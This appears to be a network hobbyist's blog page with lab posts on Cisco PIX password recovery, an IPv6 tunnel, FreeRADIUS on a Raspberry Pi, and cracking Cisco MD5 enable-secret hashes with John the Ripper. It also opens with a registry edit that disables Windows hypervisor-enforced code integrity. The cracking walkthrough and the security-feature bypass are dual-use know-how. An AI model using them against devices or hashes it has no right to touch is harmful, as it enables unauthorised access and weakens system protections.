HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity

3. Edit the Dword Value from 1 to 0 -- > means OFF

4. Restart & enjoy as your graphics works as a charm again~!
at No comments:
Štítky: , , ,

Friday, July 15, 2016

PIX525 - Part I.

PIX525 - ASA Firewall

Password recovery howto step-by-step


This platform has an Unrestricted (UR) license.
  --------------------------------------------------------------------------
                                 .            .                            
                                 |            |                            
                                |||          |||                           
                              .|| ||.      .|| ||.                         
                           .:||| | |||:..:||| | |||:.                      
                            C i s c o  S y s t e m s                       
  --------------------------------------------------------------------------

Turn on just ONE of the devices - choose which is going to be primary. 
When logged in issue command:

write erase
reload
 
When boot up again, let's configure it! 

As one of the devices still had a configuration i had to perform a Password Recovery - if you are used from other Cisco devices like Switches and Routers -- not so easy.
Special file is needed with Password Tool and also connection to TFTP server.

So first, let's run our TFTP server from C2811 router:

tftp-server file usbflash0:8529-np70.bin
 
When you have TFTP ready, prepare interface for connection to PIX. I set-up 172.17.17.17 as IP address and connected Fa0/1 to Ethernet 0 on PIX.

Use BREAK or ESC to interrupt flash boot.
Use SPACE to begin flash boot immediately.
Flash boot interrupted.                        
0: i8255X @ PCI(bus:0 dev:14 irq:10)
1: i8255X @ PCI(bus:0 dev:13 irq:11)

Ethernet auto negotiation timed out.
Ethernet port 1 could not be initialized.
Use ? for help.
monitor>
monitor>
monitor> ?
?                 this help message
address   [addr]  set IP address of the PIX interface on which
                  the TFTP server resides
file      [name]  set boot file name
gateway   [addr]  set IP gateway
help              this help message
interface [num]   select TFTP interface
ping      <addr>  send ICMP echo
reload            halt and reload system
server    [addr]  set server IP address
tftp              TFTP download
timeout           TFTP timeout
trace             toggle packet tracing
monitor>
monitor> address ?
address 0.0.0.0
monitor>
monitor> interface 0
0: i8255X @ PCI(bus:0 dev:14 irq:10)
1: i8255X @ PCI(bus:0 dev:13 irq:11)

Using 0: i82557 @ PCI(bus:0 dev:14 irq:10), MAC: 0013.60e2.bbb6
monitor>
monitor> address 172.17.17.18 255.255.0.0
address 0.0.0.0

monitor> address 172.17.17.18
address 172.17.17.18
monitor>
monitor> gateway 172.17.17.17
gateway 172.17.17.17
monitor>
monitor>
monitor> ping 172.17.17.17   --- for testing purposes, no ping / no tftp;)
Sending 5, 100-byte 0xe1ab ICMP Echoes to 172.17.17.17, timeout is 4 seconds:
!!!!!
Success rate is 100 percent (5/5)
monitor>
monitor>
monitor> server 172.17.17.17
server 172.17.17.17
monitor>
monitor> file 8529-np70.bin
file 8529-np70.bin
monitor>
monitor>
monitor> tftp
tftp 8529-np70.bin@172.17.17.17 via 172.17.17.17.............................................................................................................................................................................................................................................................
Received 129024 bytes

Cisco PIX Security Appliance password tool (3.0) #0: Thu Jun  9 21:45:44 PDT 2005

Initializing flashfs...
flashfs[0]: 7 files, 3 directories
flashfs[0]: 0 orphaned files, 0 orphaned directories
flashfs[0]: Total bytes: 16128000
flashfs[0]: Bytes used: 14300160
flashfs[0]: Bytes available: 1827840
flashfs[0]: Initialization complete.
Using the default startup configuration

Do you wish to erase the passwords? y/n [n]: y
The following lines will be removed from the configuration:
        enable password H75KO93BH/Ur8Ksg encrypted
        passwd H75KO93BH/Ur8Ksg encrypted
        aaa authentication enable console LOCAL
        aaa authentication ssh console LOCAL
        aaa authorization command LOCAL

Do you want to remove the commands listed above from the configuration? y/n [n] y
Passwords and aaa commands have been erased.


And so that's it - we have an access to enable mode and into config terminal on PIX-525 ASA Firewall.

New issue: 
- one device is with Active/Active license and second with Active/Standby

   
at No comments:
Štítky: , , , , , , ,

Thursday, July 7, 2016

IPv6 tunnelling


IPv6 Tunnelling
w/Cisco Router 2811


telnet 64.62.142.154

*************************************************************************
*****                      route-server.he.net                      *****
*****              Hurricane Electric IP Route Monitor              *****
*****                           AS 6939                             *****
*************************************************************************

This router maintains peering sessions with some of the core routers in
Hurricane Electric's network. Hurricane Electric operates an international
Internet Backbone and offers transit, colocation, and dedicated servers.

Location                  IPv4                  IPv6
---------------------     ----------------      ------------------------
North America
 Equinix Seattle          216.218.252.176       2001:470:0:3d::1
 Equinix Palo Alto        216.218.252.165       2001:470:0:1b::1
 Equinix San Jose         216.218.252.164       2001:470:0:1a::1
 Hurricane Fremont 1      216.218.252.161       2001:470:0:23::1
 One Wilshire Los Angeles 216.218.252.178       2001:470:0:6c::1
 Equinix Chicago          216.218.252.168       2001:470:0:16::1
 Equinix Dallas           216.218.252.167       2001:470:0:1d::1
 Equinix Toronto          216.218.252.147       2001:470:0:99::1
 Equinix New York         216.218.252.171       2001:470:0:13::1
 Equinix Ashburn          216.218.252.169       2001:470:0:17::1
 NOTA Miami               216.218.252.177       2001:470:0:4a::1
 CoreSite Denver          216.218.252.157       2001:470:0:155::1
 1102 Grand Kansas City   216.218.252.190       2001:470:0:22b::1
 Cologix Montreal         216.218.252.193       2001:470:0:224::1
Europe
 Telecity London          216.218.252.211       2001:470:0:2cc::1
 NIKHEF Amsterdam         216.218.252.173       2001:470:0:e::1
 Interxion Frankfurt      216.218.252.174       2001:470:0:2a::1
 Telehouse Paris          216.218.252.184       2001:470:0:1ae::1
 Equinix Zurich           216.218.252.153       2001:470:0:10c::1
 TeleCity Stockholm       216.218.252.154       2001:470:0:10f::1
 PLIX/LIM Warsaw          216.218.252.189       2001:470:0:215::1
Asia
 Mega-I Hong Kong         216.218.252.180       2001:470:0:c2::1
 Equinix Tokyo            216.218.252.151       2001:470:0:10a::1
 Equinix Singapore        216.218.252.179       2001:470:0:169::1

Configuration of IPv6 Tunnelling

(The IP addresses had been change for security reasons)
#ipv6 unicast-routing
#conf t
!        
interface Tunnel0
 description Hurricane Electric IPv6 Tunnel Broker
 no ip address
 ipv6 address 2001:220:6E:218::2/64
 ipv6 enable
 tunnel source 28.10.16.15
 tunnel mode ipv6ip
 tunnel destination 216.66.86.12
!(The IP addresses had been change for security reasons)


at No comments:
Štítky: , , , ,

FreeRadius with Raspberry Pi


RADIUS Authentication Server on RaspberryPi

BAD TEST:
test@raspberryPi:~ $ radtest kralvesmiru test123 127.0.0.1 0 testing123
Sending Access-Request of id 114 to 127.0.0.1 port 1812
    User-Name = "kralvesmiru"
    User-Password = "test123"
    NAS-IP-Address = 127.0.1.1
    NAS-Port = 0
    Message-Authenticator = 0x00000000000000000000000000000000
rad_recv: Access-Reject packet from host 127.0.0.1 port 1812, id=114, length=20
test@raspberryPi:~ $
Changes were done:


sudo nano /etc/freeradius/users
sudo nano /etc/freeradius/clients.conf
sudo nano /etc/freeradius/radiusd.conf

FreeRadius restarted:


 sudo service freeradius stop
sudo service freeradius start

Live debug log output turned on:

sudo tail -f /var/log/freeradius/radius.log

And voila! Radius is working now with basic configuration.

test@raspberryPi:~ $ radtest kralvesmiru test123 127.0.0.1 0 testing123
Sending Access-Request of id 36 to 127.0.0.1 port 1812
    User-Name = "kralvesmiru"
    User-Password = "test123"
    NAS-IP-Address = 127.0.1.1
    NAS-Port = 0
    Message-Authenticator = 0x00000000000000000000000000000000
rad_recv: Access-Accept packet from host 127.0.0.1 port 1812, id=36, length=20
test@raspberryPi:~ $











at No comments:
Štítky: , , , , , , ,

MD5 password cracking

MD5 password cracking

Jack The Ripper

vs.

Cisco's enable secret


$ sudo apt install john
Selecting previously unselected package john.
Preparing to unpack .../john_1.8.0-2_armhf.deb ...
Unpacking john (1.8.0-2) ...
Processing triggers for man-db (2.7.0.2-5) ...
Setting up john-data (1.8.0-2) ...
Setting up john (1.8.0-2) ...
# sh run | s secret
enable secret $1$sSWq$CGWilSWbR821tNBqcnFTo.

$ echo '$1$sSWq$CGWilSWbR821tNBqcnFTo.' > /home/pi/md5_hash

$ john /home/pi/md5_hash
Created directory: /home/pi/.john
Loaded 1 password hash (md5crypt [MD5 32/32])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:16 11% 2/3 0g/s 1008p/s 1008c/s 1008C/s miamimiami
0g 0:00:00:24 16% 2/3 0g/s 1014p/s 1014c/s 1014C/s CHARLIE

cisco            (?)
1g 0:00:03:28 3/3 0.004807g/s 972.3p/s 972.3c/s 972.3C/s cisco
Use the "--show" option to display all of the cracked passwords reliably
Session completed

$ john /home/netmag/md5_hash
Created directory: /home/netmag/.john
Loaded 1 password hash (md5crypt [MD5 32/64 X2])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 15% 2/3 0g/s 11887p/s 11887c/s 11887C/s 1chad..1chainsaw
cisco            (?) -- easy password done in 15secs
1g 0:00:00:15 3/3 0.06485g/s 13116p/s 13116c/s 13116C/s cisco..cisca
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Comparing JackCracking on Raspberry Pi and Laptop 

-- Raspberry Pi 2 B+ is much slower than a laptop (i7 3.6GHz, 8GB RAM)
-- 15secs on laptop against 03mins28s on RPi

-- With more difficult / longer passwords it is taking even more -- up to 25hrs comparing to 13.5hrs on laptop

$ echo '$1$lzxg$Ny2blL8TiisWpTP6I//9f/' > /home/pi/md5_hash

RPi
0g 0:01:56:20 3/3 0g/s 1019p/s 1019c/s 1019C/s ashmer7
0g 0:01:56:24 3/3 0g/s 1019p/s 1019c/s 1019C/s aspladi

-- 10hrs and still running on Raspberry Pi

0g 0:10:35:38 3/3 0g/s 1010p/s 1010c/s 1010C/s booy6h
0g 0:11:01:19 3/3 0g/s 1010p/s 1010c/s 1010C/s mb48sp
0g 0:11:10:05 3/3 0g/s 1010p/s 1010c/s 1010C/s lugs35

-- and finally after 18hrs i gave up... need to use Tacacs server :D

0g 0:16:42:11 3/3 0g/s 1011p/s 1011c/s 1011C/s b1a37d
0g 0:16:43:15 3/3 0g/s 1011p/s 1011c/s 1011C/s jrji1y
0g 0:17:47:19 3/3 0g/s 1012p/s 1012c/s 1012C/s rsl4lg
0g 0:17:49:00 3/3 0g/s 1012p/s 1012c/s 1012C/s hgiros
0g 0:17:49:59 3/3 0g/s 1012p/s 1012c/s 1012C/s noudir
0g 0:18:05:44 3/3 0g/s 1013p/s 1013c/s 1013C/s cd1buy
0g 0:18:05:47 3/3 0g/s 1013p/s 1013c/s 1013C/s cdm74s
Session aborted 
at No comments:
Štítky: , , , ,
Subscribe to: Posts (Atom)